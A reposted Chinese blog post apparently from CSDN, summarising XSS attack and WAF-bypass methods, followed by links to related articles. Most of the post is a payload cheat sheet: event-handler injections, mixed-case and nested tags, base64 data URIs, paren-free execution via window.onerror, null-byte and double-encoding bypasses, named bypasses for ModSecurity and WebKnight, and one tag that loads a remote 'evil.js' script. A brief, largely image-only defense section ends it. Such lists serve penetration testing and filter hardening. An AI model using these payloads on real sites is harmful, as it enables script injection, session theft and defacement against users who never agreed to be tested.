XSS攻击方法总结

最新推荐文章于 2025-10-19 22:41:12 发布
转载 最新推荐文章于 2025-10-19 22:41:12 发布 · 3.5k 阅读 · 20 ·
CC 4.0 BY-SA版权
原文链接:https://blog.youkuaiyun.com/qq_29277155/article/details/51320064

参考链接https://blog.youkuaiyun.com/qq_29277155/article/details/51320064

0x01.常规插入及其绕过

在这里插入图片描述
DOM型XSS,DOM全称为文档对象模型,与反射型存储型xss的不同之处在于其不会经过服务端的处理,而是经过JavaScript dom的渲染构造完dom树后,浏览器解析时才会被js的解析引擎解析执行。

1. 利用字符编码

见前一章第2讲,有unicode(html),ascii(js),hex(url)…

2 绕过长度限制

1.利用事件缩短长度:

 "οnclick=alert(1)//

2.最常用的一个“藏代码”的地方,就是“location.hash”。

在这里插入图片描述

3.两个文本框,第二个文本框允许写入更多的字节。此时可以利用HTML的”注释符号“

"><!--
--><script>alert(xss);<script>"

4.使用标签:

标签是定义所有使用”相对路径”标签的hosting地址

<body>
<base href="http://www/google.com" />
<img scr="/int1/...png" />
</body>

在这里插入图片描述

5.window.name的妙用:

window.name对象是一个很神奇的东西,对当前的window.name对象赋值,没有特殊字符的限制。因为window对象是浏览器的窗体,而并非document对象,因此很多时候window对象不受同
策略的限制。攻击者利用这个对象,可以实现跨域、跨页面传递数据。

在这里插入图片描述

在这里插入图片描述

3.使用基础标签

前篇,

0x02探测的规则

1 WAF规则探测

  1. 使用无害的payload,类似<b>,<i>,<u>观察响应,判断应用程序是否被HTML编码,是否标签被过滤,是否过滤<>等等;

  2. 如果过滤闭合标签,尝试无闭合标签的payload(<b,<i,<marquee)观察响应;

  3. 尝试以下的payload.

     <script>alert(1);</script>

 <script>prompt(1);</script>
 
 <script>confirm      (1);</script>
 
 <script src="http://rhainfosec.com/evil.js">

2 大小写混合字符

<scRiPt>alert(1);</scrIPt>

1、如果大小写不行的话,<script>被过滤尝试<scr<script>ipt>alert(1)</scr<script>ipt>;

2、使用<a>标签测试

<a  href=“http://www.google.com">Clickme</a>

<a被过滤?
href被过滤?
其他内容被过滤?

如果没有过滤尝试使用

<a href=”javascript:alert(1)”>Clickme</a>

尝试使用错误的事件查看过滤

<a href="rhainfosec.com" onclimbatree=alert(1)>ClickHere</a>

HTML5拥有150个事件处理函数,可以多尝试其他函数

<body οnhashchange=alert(1)><a href=#>clickit

3. 测试其他标签

1.src属性

在这里插入图片描述

<IFRAME SRC="javascript:alert(29);"></IFRAME>

2.iframe标签

简直不可思议-----------可以不用>,大概是</a当成无意义数据了。。。。。。。。。。。。。。。。。。。。

<iframe onmouseover=javascript:alert(1) </a>

<script>alert(1) </script </a>

在这里插入图片描述

3.action属性

<form action=javascript:alert(22)><input/type=submit>

4.“data”属性

<META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
K">


<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">

5.嵌套

<scr<scrip>ip>

6.事件处理

<svg/οnlοad=prompt(1);>
<marquee/onstart=confirm(2)>/
<body οnlοad=prompt(1);>
<select autofocus οnfοcus=alert(1)>
<textarea autofocus οnfοcus=alert(1)>
<keygen autofocus οnfοcus=alert(1)>
<video><source οnerrοr="javascript:alert(1)">

7.圆括号被过滤

<a onmouseover="javascript:window.onerror=alert;throw 1">aqq</a>

<img src=x onerror="javascript:window.onerror=alert;  throw 1">

 <body onload="javascript:window.onerror=alert;throw 1">

 <body onload="javascript:window.onerror=eval;throw '=alert\x2813\x29'">
 
 <body onload="javascript:window.onerror=eval;throw &#039;=alert\x2813\x29&#039;">

8.location

<a onmouseover=location='javascript:alert(1)'>click

<body onfocus=location='javascript:alert(1)'>click

9.();:被过滤

 <svg><script>alert&#40/1/&#41</script>

竟然绕过了<script>标签html不编码的规则

第一层解码:

<a href="j&#x41vascript&#58alert%2831337%29">Hello</a>

第二层解码----------

&#x26 #x26解码后为**&#26**,再次解码为**&**

%25%28 解码后为 %28 再次解码为**(**

<a  href="j&#x26#x26#x41vascript:alert%252831337%2529">Hello</a>

10编码

JavaScript是很灵活的语言,可以使用十六进制、Unicode、HTML等进行编码,以下属性可以被编码

href=
action=

location=
on*=
name=
background=
poster=
src=

data= //只支持base64

0x03基于上下文的过滤

1.输入反射属性

<input value="XSStest" type=text>

我们可以使用 “><imgsrc=x οnerrοr=prompt(0);>触发
但是如果<>被过滤,我们仍然可以使用“ autofocusοnfοcus=alert(1)//触发,基本是使用“ 关闭value属性,再加入我们的执行脚本

" οnmοuseοver="prompt(0) x="
" οnfοcusin=alert(1)     autofocus x="
" οnfοcusοut=alert(1)     autofocus x="
" οnblur=alert(1) autofocus     a="

输入反射在<script>标签内
类似这种情况:

<script>
Var x=”Input”;
</script>

通常,我们使用“></script>,闭合前面的</script>标签,然而在这种情况,我们也可以直接输入执行脚本alert(), prompt()confirm() ,
例如:“;alert(1)//

2.非常规事件监听

在这里插入图片描述

3.超文本内容

代码中的情况如下

<a href=”Userinput”>Click</a>

可以使用javascript:alert(1)//直接执行

<a href="javascript:alert(1)//">Click</a>

4.变形

主要包含大小写JavaScript变形

javascript&#058;alert(1)
javaSCRIPT&colon;alert(1)
JaVaScRipT:alert(1)
javas&Tab;cript:\u0061lert(1);
javascript:\u0061lert&#x28;1&#x29

5.编码绕过(强)

在这里插入图片描述

<script>
encodeURIComponent(''-prompt(1)-'')
//等价于
''-alert(1)-''
</script>

   <svg>
   <script>
    encodeURIComponent(&#039;&#039;-alert(1)-&#039;&#039;)
    encodeURIComponent(&#039;&#039;-prompt(1)-&#039;&#039;)
  </script>

6. 输入反射在svg标签内

在这里插入图片描述
输入&quot避开 URL对"的编码,随后HTML解码为"

7.字符集

在这里插入图片描述

8 空字节绕过

最长用来绕过mod_security防火墙,形式如下:

<scri%00pt>alert(1);</scri%00pt>
<scri\x00pt>alert(1);</scri%00pt>
<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>

空字节只适用于PHP 5.3.8以上的版本???

9 语法BUG

10 Unicode分隔符(暂时不懂)

在这里插入图片描述

11.缺少X-frame选项(未验证)

在这里插入图片描述

12.Window.name欺骗

13ModSecurity绕过

在这里插入图片描述
参考http://blog.spiderlabs.com/2013/09/modsecurity-xss-evasion-challenge-results.html

14 WEB KNIGHT绕过

<a href="j&Tab;a&Tab;v&Tab;ascript:alert(1)//">Click</a>

使用 编码绕过.
在这里插入图片描述

15.XSS防御总结

在这里插入图片描述
在这里插入图片描述

1.处理富文本

在这里插入图片描述

2.防御DOM Based XSS

事实上,DOM Based XSS是从Javascript中输出数据到HTML页面中。

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

XSS攻击绕过方法以及绕过waf方法语句大全 XSS攻击语句这一篇足够
盾悟
12-31 1万+
1. 使用HTML实体编码 2. 大小写混合 3. 利用JavaScript事件 4. 利用URL编码 5. 使用不完整的HTML标签 6. 利用编码绕过 7. 使用不寻常的标签 8. 利用CDATA 9. 利用注释 10. 使用文档对象模型(DOM) 11. 利用HTML5功能 12. 使用特殊字符 13. 利用外部脚本 14. 使用IFrame 15. 利用CSS注入 16. 使用数据URI 17. 利用SVG 18. 使用Base64编码 19. 利用JavaScr
xss攻击
qq_46312220的博客
08-18 488
2.1 Xss(跨站脚本攻击) 2.1.1 原理 恶意web用户通过将恶意脚本代码植入到提供给其他用户使用的页面中来达到攻击的目的 2.1.2 攻击类型: 反射型:通过把恶意代码放入url中进行注入,后端解析url并将恶意的代码拼接到html中返回给浏览器,浏览器由于无法识别哪些是恶意代码就会解析执行。由于只有点击了这种带有恶意代码的url后攻击才能生效,所有攻击者往往诱导被攻击者点击攻击者指定的特色url。 存储型又称持久型:攻击者通过技术博客中的评论,留言,以及各种可能的方式将恶意代码提交到数据
基于Antisamy项目实现防XSS攻击
热门推荐
gavinloo的专栏
11-06 1万+
最近项目上线,请第三方公司进行了一次渗透性测试,被发现存在多处XSS攻击。由于我们对于URL的Get请求已经通过URLFilter进行了特殊字符过滤,Get请求的漏洞已经被封堵,但是对于Post请求考虑到我们项目存在表单提交,富文本编辑等功能,不敢贸然的使用Filter对关键字进行过滤。 为了解决上述问题,我们采用了OWASP的一个开源的项目AntiSamy来彻底解决XSS攻击问题。AntiSa
XSS 攻击详解:原理、类型与防范策略
最新发布
技术分享
10-19 1693
XSS(跨站脚本攻击)是一种常见的网络安全漏洞,攻击者通过在受信任网站中注入恶意脚本,在用户浏览器中执行。主要分为存储型(脚本存储在服务器)、反射型(通过URL参数传播)和DOM型(完全在客户端执行)。XSS可导致会话劫持、数据窃取等严重后果。防范措施包括:输入验证与过滤、输出编码转义、内容安全策略(CSP)、设置HttpOnly/Secure Cookie等安全响应头,以及使用现代前端框架的自动转义功能。防御核心原则是"不信任任何用户输入",需采用多层次防护策略。
xss攻击语句大全。。
04-16
网站安全测试。。xss漏洞。。免去你输入的麻烦。可以直接复制粘贴。。
常见XSS攻击方法
商务合作 | 面试培训 | 职场规划 ==>主页扫码
03-20 5943
一、什么是XSS? XSS全称是Cross Site Scripting即跨站脚本,当目标网站目标用户浏览器渲染HTML文档的过程中,出现了不被预期的脚本指令并执行时,XSS就发生了。 这里我们主要注意四点:1、目标网站目标用户;2、浏览器;3、不被预期;4、脚本。 二、XSS有什么危害? 当我们知道了什么是XSS后,也一定很想知道它到底有什么用,或者有什么危害,如何防御。 关于XSS有...
XSS攻击
baidu_26872161的博客
09-20 284
1、XSS XSS(Cross Site Scripting)攻击全称跨站脚本攻击,为了不与CSS(Cascading Style Sheets)混淆,故将跨站脚本攻击缩写为XSSXSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。 通俗的来说就是我们的页面在加载并且渲染绘制的过程中,如果加载并执行了意料之外的程序或代码(脚本、样式),...
安全漏洞XSS攻击方法详解
01-26
总结来说,XSS攻击是一种严重的安全威胁,它利用Web应用程序的漏洞,通过注入恶意脚本,影响用户浏览器的行为。理解XSS的工作原理、潜在危害以及防范措施对于维护网络安全至关重要。开发者需要实施严格的输入验证和...
springmvc4配置防止XSS攻击方法
04-05
总结来说,Spring MVC通过配置自定义过滤器来防止XSS攻击,是目前广泛采用的一种有效策略。同时,对于SQL注入的防范需要开发者在编写代码时提高警惕,确保每一步操作都不会为恶意攻击者打开方便之门。实现安全防护的...
Spring-MVC处理XSS、SQL注入攻击方法总结
11-14
### Spring MVC 处理 XSS 和 SQL 注入攻击方法总结 #### 一、引言 在 Web 开发领域,特别是基于 Java 的应用开发中,Spring MVC 框架因其灵活高效的特点而被广泛采用。然而,随着互联网技术的发展,网络安全问题...
防止XSS攻击解决办法
01-20
防止XSS攻击是保护Web应用安全的重要一环,对于任何Web开发者来说都是必备的知识。 一、XSS攻击类型 XSS攻击主要分为三类:反射型XSS、存储型XSS和DOM型XSS。 1. 反射型XSS攻击者通过构造恶意链接,诱使用户点击...
XSS漏洞常见攻击方式
天天学安全专属博客
10-08 4427
1.危害 都是通过js脚本来实现的浏览器内核版本也会影响到js代码的实现 1、钓鱼欺骗 2、网站挂马 3、身份盗用 4、盗取网站用户信息 5、垃圾信息发送 6、劫持用户Web行为 7、XSS蠕虫 2.原理 XSS 属于被动式的攻击攻击者先构造一个跨站页面,利用script、、等各种方式使得用户浏览这个页面时,触发对被攻击站点的http 请求。此时,如果被攻击者如果已经在被攻击站点登录,就会持有该站点cookie。这样该站点会认为被攻击者发起了一个http 请求。而实际
XSS攻击方法
blrk
05-11 1290
首先通过构造XSS代码的方法来构造XSS脚本,用以测试发现漏洞,然后利用以下方法实现攻击。 (1)Redirection - 重定向 重定向被攻击者,如document.location=http://www.evil.com (2)Clickjacking - 点击劫持 可用来钓鱼,如通过onclick触发 (3)URL Spoofing - URL欺骗 常用于钓鱼,页面被劫持并且信
XSS 攻击(详细)
FFNCL的博客
03-31 6134
XSS,即跨站脚本攻击,是 Web 安全领域中十分常见的漏洞类型。攻击者通过在 Web 页面中注入恶意脚本,当用户浏览该页面时,恶意脚本便会在用户的浏览器中执行。借助这种攻击方式,攻击者能够窃取用户的敏感信息,如登录凭证、个人隐私数据等;劫持用户会话,以用户身份进行各种操作;甚至篡改网站内容,严重损害网站的声誉和用户信任。举例来说,某电商网站若存在 XSS 漏洞,攻击者可通过注入恶意脚本,窃取用户的账号密码,进而盗刷用户的账户资金,给用户带来直接的经济损失。
XSS攻击的三种方法
小赵同学的博客
01-06 2561
掌握跨站脚本的概念 理解跨站脚本的实例 什么是XSS? 跨站脚本 1、由于Web应用层序程序对用户的输入过滤不足产生的。 2、攻击者利用漏洞注入恶意JS代码到网页之中,当用户浏览网页时就会执行恶意代码。 3、主要可以对用户cookie资料窃取、会话劫持、钓鱼等。 攻击流程 解:攻击者向服务器发起XSS攻击注入JS代码,用户浏览被攻击的服务器发送浏览请求 服务器返回响应包含攻击者注入的代码 XSS的分类 XSS根据其特性和利用手法分为三大类: 1、反射性跨站脚本 2、存储性跨站脚本 3、DOM
xss攻击方式三
weixin_43803070的博客
05-11 411
7)扰乱过滤规则 1.大小写转换 2.不使用双引号,使用单引号。 <img scr=‘javascript:alert(“xss”)’> 3.大小写混合 4.不使用引号 5.利用字符编码,对字符串进行十六进制、和十进制的转化。 8)另外JavaScript中有一个eval函数,该函数可以计算字符串,并执行其中的Javascript代码。我们可以使用\连接十六进制字符串,然后使用eva...
常见网络攻击及防御方法总结(XSS、SQL注入、CSRF攻击
xiaohui的博客
04-05 4693
  从互联网诞生之初起,无时无刻不存在网络攻击,其中XSS攻击和SQL注入攻击是网站应用攻击的最主要的两种手段,全球大约70%的网站应用攻击都来自XSS攻击和SQL注入攻击。此外,常用的网站应用攻击还包括CSRF、Session劫持等。 1、 XSS攻击   XSS攻击即跨站点脚本攻击(Cross Site Script),指的是攻击者通过篡改网页,注入恶意的HTML脚本,在用户浏览网页时,控制用户浏览器进行恶意操作的一种攻击方式。   常见的XSS攻击类型有两种,一种是反射型,攻击者诱使用户点击一个嵌入恶
XSS 攻击
wuli1024的博客
01-03 3265
Cross-Site Scripting(跨站脚本攻击)简称 XSS,是一种代码注入攻击攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值